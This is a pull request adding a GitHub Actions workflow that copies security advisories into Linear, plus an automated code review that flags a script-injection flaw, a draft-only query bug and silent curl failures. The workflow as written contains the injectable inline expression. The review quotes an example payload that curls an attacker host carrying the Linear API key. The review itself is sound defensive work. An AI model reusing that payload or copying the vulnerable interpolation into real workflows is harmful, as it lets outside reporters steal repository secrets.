### PR TITLE
chore: automatically sync security advisories to linear

### DIFF
--- a/.github/workflows/security-advisory-to-linear.yml
+++ b/.github/workflows/security-advisory-to-linear.yml
@@ -1,0 +1,93 @@
+name: Sync Security Advisories to Linear
+
+on:
+  repository_advisory:
+    types: [reported, published]
+  schedule:
+    # Poll daily at 9am UTC as a safety net for drafts
+    - cron: "0 9 * * *"
+  workflow_dispatch: {}
+
+jobs:
+  sync:
+    runs-on: ubuntu-latest
+    permissions:
+      security-events: read
+    steps:
+      - name: Fetch advisories from GitHub API
+        id: fetch
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          advisories=$(gh api \
+            -H "Accept: application/vnd.github+json" \
+            "/repos/${{ github.repository }}/security-advisories?state=draft" \
+            --jq '[.[] | {
+              ghsa_id: .ghsa_id,
+              summary: .summary,
+              severity: .severity,
+              state: .state,
+              html_url: .html_url,
+              description: .description,
+              created_at: .created_at
+            }]')
+          echo "advisories<<EOF" >> "$GITHUB_OUTPUT"
+          echo "$advisories" >> "$GITHUB_OUTPUT"
+          echo "EOF" >> "$GITHUB_OUTPUT"
+
+      - name: Create Linear issues for new advisories
+        env:
+          LINEAR_API_KEY: ${{ secrets.LINEAR_API_KEY }}
+          LINEAR_TEAM_ID: ${{ secrets.LINEAR_TEAM_ID }}
+          LINEAR_ASSIGNEE_ID: ${{ secrets.LINEAR_ASSIGNEE_ID }}
+        run: |
+          echo '${{ steps.fetch.outputs.advisories }}' | jq -c '.[]' | while read -r advisory; do
+            ghsa_id=$(echo "$advisory" | jq -r '.ghsa_id')
+            summary=$(echo "$advisory" | jq -r '.summary')
+            severity=$(echo "$advisory" | jq -r '.severity')
+            state=$(echo "$advisory" | jq -r '.state')
+            html_url=$(echo "$advisory" | jq -r '.html_url')
+            description=$(echo "$advisory" | jq -r '.description // "No description"')
+
+            # Check if a Linear issue already exists for this GHSA
+            existing=$(curl -s -X POST https://api.linear.app/graphql \
+              -H "Content-Type: application/json" \
+              -H "Authorization: $LINEAR_API_KEY" \
+              -d "{\"query\": \"{ issueSearch(filter: { description: { contains: \\\"$ghsa_id\\\" } }, first: 1) { nodes { id } } }\"}" \
+              | jq '.data.issueSearch.nodes | length')
+
+            if [ "$existing" -gt 0 ]; then
+              echo "Skipping advisory — Linear issue already exists"
+              continue
+            fi
+
+            echo "Creating Linear issue for new advisory"
+
+            # Set priority based on severity (1=urgent, 2=high, 3=medium, 4=low)
+            priority=3
+            case "$severity" in
+              critical) priority=1 ;;
+              high)     priority=2 ;;
+              medium)   priority=3 ;;
+              low)      priority=4 ;;
+            esac
+
+            title="[GHSA/$severity] $summary"
+            body="**GitHub Security Advisory**\n\n**ID:** $ghsa_id\n**Severity:** $severity\n**State:** $state\n**Link:** $html_url\n\n---\n\n$description"
+
+            curl -s -X POST https://api.linear.app/graphql \
+              -H "Content-Type: application/json" \
+              -H "Authorization: $LINEAR_API_KEY" \
+              -d "$(jq -n \
+                --arg title "$title" \
+                --arg body "$body" \
+                --arg teamId "$LINEAR_TEAM_ID" \
+                --arg assigneeId "$LINEAR_ASSIGNEE_ID" \
+                --argjson priority "$priority" \
+                '{
+                  query: "mutation($input: IssueCreateInput!) { issueCreate(input: $input) { success issue { id identifier url } } }",
+                  variables: { input: { title: $title, description: $body, teamId: $teamId, assigneeId: $assigneeId, priority: $priority } }
+                }')"
+
+            echo "Linear issue created successfully"
+          done


### PR DESCRIPTION
<!-- greptile_comment -->

**Disclaimer**: Experimental PR review
---

<h3>Greptile Summary</h3>

This PR adds a GitHub Actions workflow that polls GitHub security advisories and creates corresponding Linear issues, with deduplication via a GraphQL search. There are two blocking issues that must be fixed before merging.

- **P0 – Script injection**: `${{ steps.fetch.outputs.advisories }}` is inlined directly into a single-quoted shell string on line 44. Anyone who submits a private vulnerability report (the `reported` event is open to external users) with a `'` in the summary or description can break out of the string and execute arbitrary shell commands with access to `LINEAR_API_KEY` and other secrets. Fix: pass the value through an `env:` variable (`ADVISORIES: ${{ steps.fetch.outputs.advisories }}`) and reference it as `\"$ADVISORIES\"` in the shell.
- **P1 – Published advisories silently dropped**: The API query always filters `?state=draft`, but the workflow also triggers on `published` events. Once an advisory is published it leaves draft state and is never returned by the query, so it is never synced to Linear.

<h3>Confidence Score: 1/5</h3>

Not safe to merge — contains a P0 script injection vulnerability reachable by external reporters and a P1 logic bug that silently drops published advisories.

A P0 security issue (shell injection via inlined Actions expression, exploitable by anyone who files a vulnerability report) and a P1 correctness bug (state filter mismatch means published advisories are never synced) both need to be addressed before this workflow can be safely enabled.

.github/workflows/security-advisory-to-linear.yml — all three issues are in this single file.

<details open><summary><h3>Security Review</h3></summary>

- **Script injection (P0)** in `.github/workflows/security-advisory-to-linear.yml` line 44: `${{ steps.fetch.outputs.advisories }}` is inlined into a single-quoted shell string. A single quote in any advisory field (reachable by anyone who files a private vulnerability report via the `reported` event) breaks quoting and allows arbitrary command execution with access to `LINEAR_API_KEY`, `LINEAR_TEAM_ID`, and `LINEAR_ASSIGNEE_ID` secrets. Fix by passing the value through an `env:` variable instead of inline expression interpolation.
</details>

<details><summary><h3>Important Files Changed</h3></summary>

| Filename | Overview |
|----------|----------|
| .github/workflows/security-advisory-to-linear.yml | New workflow to sync GitHub security advisories to Linear; contains a P0 script injection via inline `${{ }}` expression, a P1 logic bug where `?state=draft` filter silently drops published advisories, and a P2 silent curl failure that defeats deduplication. |

</details>

</details>

<h3>Sequence Diagram</h3>

```mermaid
sequenceDiagram
    participant GH as GitHub (advisory event / schedule)
    participant WF as Workflow Runner
    participant GHAPI as GitHub Security API
    participant LIN as Linear GraphQL API

    GH->>WF: Trigger (reported / published / schedule)
    WF->>GHAPI: GET /security-advisories?state=draft
    GHAPI-->>WF: JSON array of draft advisories
    WF->>WF: Write advisories to GITHUB_OUTPUT
    loop For each advisory
        WF->>LIN: POST issueSearch (contains ghsa_id)
        LIN-->>WF: Existing issue count
        alt No existing issue
            WF->>LIN: POST issueCreate (title, description, priority, assignee)
            LIN-->>WF: Created issue URL
        else Already exists
            WF->>WF: Skip (log message)
        end
    end
```

<details><summary>Prompt To Fix All With AI</summary>

`````markdown
This is a comment left during a code review.
Path: .github/workflows/security-advisory-to-linear.yml
Line: 44

Comment:
**Script injection via inline `${{ }}` expression**

`${{ steps.fetch.outputs.advisories }}` is expanded by the Actions runner directly into the shell script text *before* the shell runs it. Because the value is wrapped in single quotes (`echo '...'`), any single quote `'` in an advisory's `summary` or `description` terminates the string literal and the rest is executed as shell commands. This is exploitable via the `reported` event — anyone who files a private vulnerability report with a payload like `' && curl attacker.com/exfil?t=$LINEAR_API_KEY && '` will achieve code execution with access to all `env:` secrets.

The fix is to pass the output through an environment variable so the expression value is never inlined into script text. Add `ADVISORIES: ${{ steps.fetch.outputs.advisories }}` to the `env:` block above and replace line 44 with `echo "$ADVISORIES" | jq -c '.[]' | ...`. Values passed via `env:` are never executed as code.

How can I resolve this? If you propose a fix, please make it concise.

---

This is a comment left during a code review.
Path: .github/workflows/security-advisory-to-linear.yml
Line: 24

Comment:
**`published` trigger never matches the `state=draft` query**

The workflow fires on `repository_advisory: types: [reported, published]`, but the API call always filters `?state=draft`. When an advisory is published (state changes from draft → published), the `published` event fires and the job runs — but the query returns an empty list because the advisory is no longer in `draft` state. It will also be absent from every subsequent daily poll, so published advisories are silently dropped and never synced to Linear.

Either drop the state filter so all advisories are considered, and let the deduplication check (`issueSearch`) prevent duplicate Linear issues from being created for advisories already synced.

How can I resolve this? If you propose a fix, please make it concise.

---

This is a comment left during a code review.
Path: .github/workflows/security-advisory-to-linear.yml
Line: 53-57

Comment:
**Silent curl failures break deduplication**

Both `curl` calls use `-s` (silent) but no `--fail`. If the Linear API returns an HTTP error (e.g. 401 for a bad/missing `LINEAR_API_KEY`), the response body is still piped to `jq`. `jq '.data.issueSearch.nodes | length'` on an error response returns `null` or fails, making `existing` empty or `0` — so the duplicate check always passes and the issue creation step runs on every scheduled poll, potentially flooding Linear with duplicates. Consider adding `--fail` and `// 0` as a fallback in jq.

How can I resolve this? If you propose a fix, please make it concise.
`````

</details>

<sub>Reviews (1): Last reviewed commit: ["chore: automatically sync security advis..."](https://github.com/langfuse/langfuse/commit/531938615c6bb8aef49901d6e7ca82a5269cd17e) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=28640156)</sub>

> Greptile also left **2 inline comments** on this PR.

<!-- /greptile_comment -->